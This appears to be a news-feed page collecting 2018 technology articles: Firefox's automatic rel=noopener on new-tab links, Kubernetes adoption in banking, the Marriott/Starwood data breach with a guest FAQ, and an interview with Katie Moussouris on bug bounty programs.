The preference dom.targetBlankNoOpener.enable controls the functionality. It is only available in Firefox 65 and set to true by default (which means that rel="_noopener" is added).


Firefox security: rel=noopener for target=_blank

Firefox users may change the preference to turn off the feature. While it is not recommended because of the security implications, you may want to do so if you run into compatibility issues.

Load about:config?filter=dom.targetBlankNoOpener.enable in the browser's address bar. Confirm that you will be careful if the warning prompt is displayed. Double-click on the preference.

A value of true means that rel="noopener" is added to links with target="_blank", a value of false that it is not.

Mozilla targets Firefox 65 for the Stable release. Things may get delayed depending on issues that may be reported or noticed. Firefox 65 will be released on January 29, 2019 . (via Sren Hentzschel )

Summary


Firefox security: rel=noopener for target=_blank

Article Name

Firefox security: rel=noopener for target=_blank

Description

Mozilla is testing a new security feature in Firefox Nightly currently that adds rel="noopener" automatically to links that use target="_blank".

Author

Martin Brinkmann

Publisher

Ghacks Technology News

Logo


Firefox security: rel=noopener for target=_blank

Advertisement

Making Kubernetes a Reality for Financial Services

$
0
0

Making Kubernetes a Reality for Financial Services

Terry Shea

Terry Shea is Chief Revenue Officer for Kublr, the most comprehensive enterprise Kubernetes platform.

The financial services industry has traditionally been very technology dependent, but often has trouble adopting new technologies. The payments sector is somewhat of an exception to this. M-Pesa for example, the mobile payments solution from Vodafone and its subsidiaries that enables unbanked individuals in Africa, India and elsewhere to receive and make payments, has been around for over a decade. Closer to home, teens and tweens are now splitting the cost of a pizza or an Uber using apps like Venmo, which has seen 80 percent growth this year.

Many of these financial technology firms (“fintechs”) have taken advantage of modern application architectures and DevOps practices that are associated with “cloud native” technologies. Monzo, the “mobile” U.K. bank, discussed this in their presentation “ Building a Bank With Kubernetes .” They released their annual report in July citing growth from 0 to 750,000 customers in 3 years. And Monzo is not alone. A recent U.S. Government report highlighted the growth of financial services by non-bank firms, chiefly fintechs. Some of the more striking data points:

3,300 fintech firms were created between 2010 and 2017 Financing of fintech firms reached $22 Billion in 2017 Personal loans by these firms went from 1 percent to 36 percent of loans in that period
Making Kubernetes a Reality for Financial Services

Oleg Chunikhin, CTO, Kublr

Oleg Chunikhin has been working in the field of software architecture and development for nearly 20 years. Oleg joined Kublr as the CTO in 2016. Oleg has championed the standardization of DevOps in all the company does and is a firm believer in driving the adoption of automation and artificial intelligence applications. Oleg holds a Bachelor of Mathematics and a Master of Applied Mathematics and Computer Science from Novosibirsk State University and is an AWS Certified Software Architect.

So what is cloud native, how does it impact application development and IT Operations, and how can traditional financial services firms leverage it to compete with newer fintechs?

The Cloud Native Computing Foundation (CNCF) charter described cloud native applications as having the following characteristics:

Container packaged Dynamically managed Microservices oriented

Containerization enables rapid deployment and updating of applications. This is particularly true when microservices are used. And the dynamic orchestration is achieved through Kubernetes. Kubernetes handles deployments, maximizes resource utilization, provides “desired state management” capabilities, and enables application auto-scaling.

Most development teams find that using containers in their application development processes is not too difficult, but IT operations teams usually have much less experience with Kubernetes. Complicating this is the fact that most established financial services firms can’t or won’t get rid of monolithic core applications overnight. Unlike Monzo, which wrote its back-end in microservices, established financial services firms will need to architect hybrid applications with cloud-native front-ends running either in the cloud, in their data centers, or both, and connecting to back-end services running in the data center.

The Kublr platform enables IT Operations teams to deploy, run, and manage Kubernetes wherever they wish, but to architect a total solution there are several factors to consider. We provide our recommendations below:

Some Considerations Before Going Cloud Native with Kubernetes

Being able to develop, run, and manage cloud native applications in multiple environments means financial services must consider how they will address some key issues:

Leveraging the Scalability of the Cloud: Horizontal Pod Autoscaling vs. Node Autoscaling

Containers, container orchestration, and microservice technologies like Kubernetes and Istio promise scalability and rapid response to changing resource demands. However, running containers still requires a real infrastructure ― whether physical or virtual machines. To help leverage the cloud’s scalability, Kubernetes supports scaling on two levels: 1) horizontal pod (auto)scaling, and 2) node (auto)scaling.

While horizontal pod scaling scales applications horizontally increasing and reducing the number of running container replicas, it doesn’t take into account the infrastructure; it merely assumes there is going to be enough resources to start new container replicas when necessary.

Node scaling, on the other hand, is concerned with (automatically) adding new nodes to the cluster when more resources are needed, and stopping or removing underutilized nodes when not needed anymore.

Horizontal pod scaling is usually much faster; reaction time takes seconds vs. minutes for node scaling. Yet both technologies are needed to realize the benefits of automatic scaling in the cloud.

Cloud Native Front-End Applications that Talk to Monolithic Backend Apps (e.g., Core Banking Systems)

Sometimes migration to a cloud native architecture requires additional considerations, such as availability requirements related to compliance and pre-existing technology. For example, a mainframe database that isn’t easily scalable may require special precautions to ensure that cloud native applications in the presentation tier scaling up and down do not affect the availability of backend databases.

Aligning Current Dev, QA, and Release Processes with a Faster Release Schedule

The new cloud native technology stack doesn’t only affect application development and delivery tools; it also requires QA and release process changes. Responsibilities shift and require adjustments to align with the faster release schedule. By its very nature, the infrastructure-as-code approach shifts certain infrastructure management concerns to Dev and introduces new DevOps practices. Some organizations adopt SRE (Site Reliability Engineer) roles to consolidate responsibilities for application quality and availability, and close the gaps between operations, QA, and development teams. In any case, processes and business are affected and need to be adjusted to get the best value out of the technology modernization.

Scaling Cluster and Application Monitoring and Providing the Right Visibility and Alerts to Dev and Ops Teams

A cloud native approach usually implies changes in application monitoring, visibility practices, and technologies. The most notable change is probably that cloud-native application identity and localization are much more fluid ― application components include multiple (and dynamically changing) replicas that move freely between nodes within the clusters ― or even across clusters ― and scale up and down; cluster nodes lack identity and can be stopped and started again in response to changing demand. The application components consist of replicas from different versions and variants, and re-route traffic based on needs, e.g., rolling out a new feature, A/B testing, etc.

These dynamic environments call for new tools, such as Prometheus, Grafana, InfluxDB, M3, ELK stack, FluentD, and Jaeger, to name a few. Integration of these monitoring tools requires serious consideration and planning.

Trouble-Shooting Microservices with Jaeger, Zipkin and Other Solutions

Traceability is one aspect of monitoring and visibility that becomes particularly important as cloud native migration efforts move further along and switch focus from an infrastructure and platform layer to application refactoring. Replacing monoliths with a microservices architecture brings a number of advantages, but also comes with its own challenges, and traceability is one of them. Jaeger, Zipkin and other frameworks emerged to close this gap. They normally integrate well with cloud native microservices frameworks like Istio and container orchestration tools like Kubernetes.

Securing Container Deployments: Container Scanning, Trusted Registries, Admin IAM, and Communication Between Nodes

Security is another facet of the new stack that requires careful consideration and planning. Container security was a legitimate reason for concerns, similar to virtualization security in the early days of virtualization adoption. And just like with virtualization, demand for reliable container security results in solutions being developed and adopted on all levels of the stack:

Container isolation and security technologies ― Kubernetes and Docker integration with SElinux and AppArmor, Linux cgroups and namespaces; Infrastructure security ― integration of container orchestration frameworks with infrastructure management layer (such as AWS, Azure and other providers for Kubernetes), security policy management and governance across infrastructure and container orchestration layers; Network security across levels ― infrastructure (VPC, subnets, routing, and network policies, security groups, etc.), containers (overlay network providers, e.g., Weave transparent encryptions), container orchestration (Kubernetes network policies, TLS, etc.), and application (e.g., Istio with transparent encryption); Application security ― transparent authentication and authorization on the level of application framework, such as Istio; Container image security ― image repository and the processes supporting image validation, scanning, signing, manual, and automatic approval, and Kubernetes admission controllers to support image deployment policies; Support for updates and security patches for all components and layers. The Cloud Native Future with Kubernetes

Across the industry, we are already seeing innovative financial services firms start to address all of these issues. Cloud native architectures are driving innovation in data science, IoT, and other areas that will provide both the threat of being disrupted and the opportunity for innovation.

The Cloud Native Computing Foundation is a sponsor of The New Stack.

Feature image via Pixabay.

Marriott International: Hackers Accessed the records of 500 Million Users

$
0
0

Marriott International: Hackers Accessed the records of 500 Million Users
Marriott International: Hackers Accessed the records of 500 Million Users
Add to favorites

“There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken”

Hotel and lodging chain Marriott International has revealed that it has been the subject of a massive data hack in which threat actors have copied the personal information of over 500 million Marriott guests.

On September 8 th of this year Marriott was alerted by an internal security tool that someone had tried to illegally access the guest reservation database of its Starwood customers. Starwood was a separate hotel chain before its acquisition by Marriott International in 2016.

Marriott say that they quickly engaged security experts to analyse the threat and they discovered that there had been unauthorised access to the Starwood data base as far back as 2014.

The threat actor had copied and encrypted information, cyber analysts decrypted the data and identified it as the Starwood guest reservation database.

Marriott International in a press release addressing the issue stated that so far they have identified approximately 500 million guest records and that for: “327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number.”

As well as “Starwood Preferred Guest (“SPG”) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences.

Marriott Hack

Some of the account records do contain credit card numbers and payment card expiration dates. Customer payment records were encrypted with (AES-128) the common Advanced Encryption Standard.

However, Marriott note that: “There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken.”

Tom van de Wiele, security consultant, F-Secure commented in an emailed statement that: “The hack was targeted at a part of the company that Marriott acquired as few years ago, being Starwood.”

“This is a common trend where it’s usually not the main company that is targeted but rather attackers aim to compromise the softer underbelly of the organisation, which are usually IT service providers, contractors and other entities with a high number of interactions within the company.”

“Interactions mean a lot of moving parts to try and control, while other acquisition and fusion efforts are going on. Things like the integration of IT systems and the security thereof take a lot of time between two companies that have to merge requirements, security policies, IT environments, technology stack and company cultures.”

Marriott International have set up support lines to help anyone affected and have contacted all the relevant policing and regulatory bodies in relation to the hack. They have also begun to step up the process of phasing out the Starwood systems.

See Also: Landmark GCHQ Publication Reveals Vulnerability Disclosure Process

Aatish Pattni, regional director for UK & Ireland for cybersecurity vendor, Link11 commented in an emailed statement that: “This follows the trend we have seen in the attacks against the aviation industry this year: these, and the related travel and hospitality sectors process and store huge amounts of high-value personal information such as passport numbers, credit-card details and more.

“Although it’s not certain that the stolen data has been used as yet, people who think they may be affected should be wary of any email communications they receive relating to the breach and should not share any other sensitive details by email. Scammers often prey on peoples’ concerns to try and harvest more data so that they can use stolen payment card details or commit other types of fraud.”

Newsmaker Interview: Katie Moussouris on Improving Bug Bounty Programs

$
0
0

The bug bounty “queen” Katie Moussouris discusses the biggest mistakes that companies launching these programs are making.

Bug bounty programs continue to increase in popularity but that popularity has its downsides.

Since the launch of the Hack the Pentagon program in 2016, bug bounty programs have quickly grown in popularity. Bugcrowd’s State of Bug Bounty report this year found that the number of programs launched in the past year has jumped by 40 percent.


Newsmaker Interview: Katie Moussouris on Improving Bug Bounty Programs

That includes players such as Google, Facebook, and Microsoft offering high rewards and with good reason. The programs have helped unearth important vulnerabilities, includinga serious flaw in Chrome on Google’s Pixel in 2018and a massive Facebook remote code execution flawin 2017.

However, as more programs arecreated, some companies are forgetting the real reason behind bug bounties. That is, instead of making their systems more secure, companies want to merely hunt bugs.Threatpost talked to Katie Moussouris, founder of Luta Security, to hear more about her thoughts about the challenges in developing and launching bug bounty programs.

What are the biggest issues we’re seeing with bug bounty programs right now?

It’s a cause that I have been taking on for the better part of the year at this point. I have noticed that, unlike five years ago when I launched Microsoft’s bug bounty program, the general acceptance for bug bounties has skyrocketed. Just this past year, bounty programs have eclipsed apparent demand for traditional penetration testing.

The overall thing is while it’s been good that people are embracing outside help from security researchers and hackers, what has been detrimental is the overuse of bug bounties as a cure-all for all of your security problems.

When I was part of a bug bounty company I very much disapproved of any messaging that said things like, ‘get a bug bounty program to prevent breaches.’ That’s just false. That’s not something that will prevent a breach, just like getting penetration testing doesn’t prevent a breach.

Say I’m developing a bug bounty program, what’s the very first step?

When you’re thinking about a bug bounty program, the very first step you should do, is ask yourself, why? What is the problem you’re actually trying to solve? So many of my customers, they come to me and say, ‘You’re the bug bounty Queen, we want to hire you to help us architect this bug bounty.’ And I say, why do you need a bug bounty right now?

They might say things like, ‘Well, you know, we don’t have anybody to handle incoming bugs.’ And I asked them all, how many incoming bugs are you getting on average per year? And they’ll say some ridiculously small number like five, or 10 or 12. And I’ll say, wait a minute, you’re feeling overwhelmed with 10 or 12 bugs, and you think starting a bug bounty will help with that? They’ll recite the marketing of the bug bounty companies where the bug bounty companies have been saying, we take all the hassle out of it, we do a managed program, and those words ‘managed program’ sounds really great to them. But what they don’t understand it, it doesn’t matter. You know, they basically just attracted a swarm of bees.

What’s the correct approach for bug bounty programs?

It’s a mixture of different approaches. Bug bounties can definitely be very helpful, especially if you’re being smart about targeting them. A bug bounty program can help bring out a particular area that you’re looking for not just a bug. Maybe you’re looking for people who you can target to hire eventually. So bug bounties can be helpful in that way.

But that in house expertise, that’s really what people need to build in terms of long term sustainable security. You’re never going to be able to outsource your bug hunting completely. That’s the most inefficient way to find bugs, is after it’s already out there, after the website is up, or the software is released, or the product is released, andasking a bunch of internet people to help you secure it.

That’s definitely against what the security industry has been preaching for the last 20 years. And yet the bug bounty companies, and their marketing departments with millions of dollars of VC backing, have effectively made the case for bounty program. Simply put, bug bounty programs are sold as bigger solutions to the problem finding and patching vulnerabilities than they really are.

Do you think that bug bounty hunters and program creators are on the same page about what it means to have a successful program?

Definitely not, because the bug bounty hunters even the best of them- are getting told a lot of the time that their submission is a duplicate.

And the way that happens is that more than one person obviously, finding the same flaw. But that happens more and more frequently, the less mature the software target is. So even the experienced bug hunters who should be able to make a really decent living doing this, they are still encountering issues, because of the fact that only the first person to report a particular bug gets paid. So they’re still doing the work and their expertise is still being utilized, but they’re not getting paid for it some of the time.

So it’s not just competition among fellow bug hunters. But there’s also the fact that the triage personnel at these bug bounty companies is actually not full time employees most of them are contractors, and actually, many of them are also bug bounty hunter. It’s basically, you know, where you’ve got a little fox-in-the-hen-house thing going on,

I’ve certainly seen bug bounty hunters refused to submit bugs to certain certain platforms, because they know fellow bug bounty hunters who are competing with them are now able to see their bug submissions. And they’re feeding really good bug reports and proof of concepts… to their competitors in this market.

What are customers’ main questions and concerns when they come to you to ask about bug bounty programs?

It’s a lot of customers who are thinking about managing different pain points in the process. It’s always a legitimate reason why they need help. They might think that a bug bounty is the solution or is the help they need.

But actually, some people come to me because they have dysfunctional bug bounty programs and they need some kind of help rejuvenating in some way. It’s not worked well for them, or the quality of bugs are low. For some companies, a bounty program is effectively just more noise.

Even with the managed programs, where a company may no longer be getting anything of value, they’re paying the bug bounty company to continue to monitor. And so they’re paying, they’re outsourcing and they’re not actually getting in quality bug submissions. That’s when they come to me asking for help.

I think the real challenge for companies is, a lot of them realize that because they’ve already started a bug bounty, they can’t just shut it down. They have to figure out how to process the information so that it’s not just a one time payment to a hacker, fixing the bug, and that’s all the value you get out of the program and relationship. We’re trying to basically make it so that a bug bounty program is one key part of the overall secure development life cyc

Marriott Starwood hotel data breach FAQ: What 500 million hacked guests need to ...

$
0
0

It’s been a couple of months since a major company unveiled a data breach that affected millions of people , so it’s time for a new one. The Marriot hotel chain has announced a major database breach that could affect anyone who stayed at its 6,700 worldwide Starwood hotel properties since 2014―up to 500 million people in total.

That’s a lot of people an a long stretch of time, so check out our FAQ for all of the information:

What happened?

Marriott says it received an alert from an internal security tool on September 8 warning of an attempt to access the Starwood guest reservation database in the United States. In its investigation of the incident, Marriott learned that an unauthorized party gained access to the company’s customer database and “copied and encrypted information, and took steps toward removing it.”

How did the hackers get in?

Marriott isn’t being totally clear here, but it appears as though this wasn’t the usual exploit of a vulnerability. Rather, someone without the proper credentials was able to access the Marriott reservation database to make a duplicate encrypted copy of customer information, which was then presumably taken outside the system.

How far back does the breach go?

Marriott says the unauthorized access goes back to 2014.

Why wasn’t Marriott alerted sooner?

Also unclear, but perhaps the unauthorized party only recently started accessing the system. Or possibly Marriott recently installed new security software that was able to detect the access.

Why are we just hearing about now?

Marriott says it was only able to decrypt the files on November 19, and is still working to uncover the scope of the breach.

What was stolen?

Marriott is still sorting through the data it was able to recover, but for most customers, the following data may have been stolen: name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (“SPG”) account information, date of birth, gender, and arrival and departure information, along with reservation dates and communication preferences.

What about credit card information?

For some users, Marriott says payment card numbers and payment card expiration dates were included in the stolen data, but card numbers were encrypted using Advanced Encryption Standard encryption (AES-128).

So my credit card is safe?

Possibly not. As Marriott explains: “There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken.”

What about my SPG points?

Marriott says there is no evidence that any loyalty points were obtained, but you should check your account for any suspicious activity.

Has the breach been stopped?

Presumably, but Marriott doesn’t explicitly say whether the unauthorized access has been shut down. However, the chain is working with law enforcement agencies and regulatory authorities, so the likelihood of a continued breach is extremely low.

What is Marriott doing to stop future breaches?

Again, it’s not totally clear if the hacker exploited a vulnerability or merely used an unauthorized password, but Marriott says it is devoting the resources necessary to phase out Starwood systems and accelerate the ongoing security enhancements to our network.

How do I know if my data was accessed?

Marriott began sending emails on a rolling basis on November 30 to affected guests, so sure to make check you spam folder if you haven’t received one.

What can I do if I was affected?

Marriott has set up a dedicated call center to answer any questions you may have. U.S. Customers can call 877-273-9481 seven days a week to reach a representative.

Should I change my password?

Marriott hasn’t said whether any accounts were accessed or passwords stolen, but it certainly can’t hurt. But this was a breach of the company’s internal database of hotel guests, not online accounts.

Should I cancel my credit card?

Also not a bad idea. If you know the credit card or cards that are on file with Marriott or Starwood hotels, cancelling them now is the best way prevent any future malfeasance.

What else can I do?

Marriott is providing all guests in the U.S., Canada, the UK with the opportunity to enroll in Kroll’s Web Watcher Monitoring Service , which tracks sites where personal information is shared and alerts you if evidence of your personal information is found.

To comment on this article and other PCWorld content, visit our Facebook page or our Twitter feed.

Viewing all 12749 articles
Browse latest View live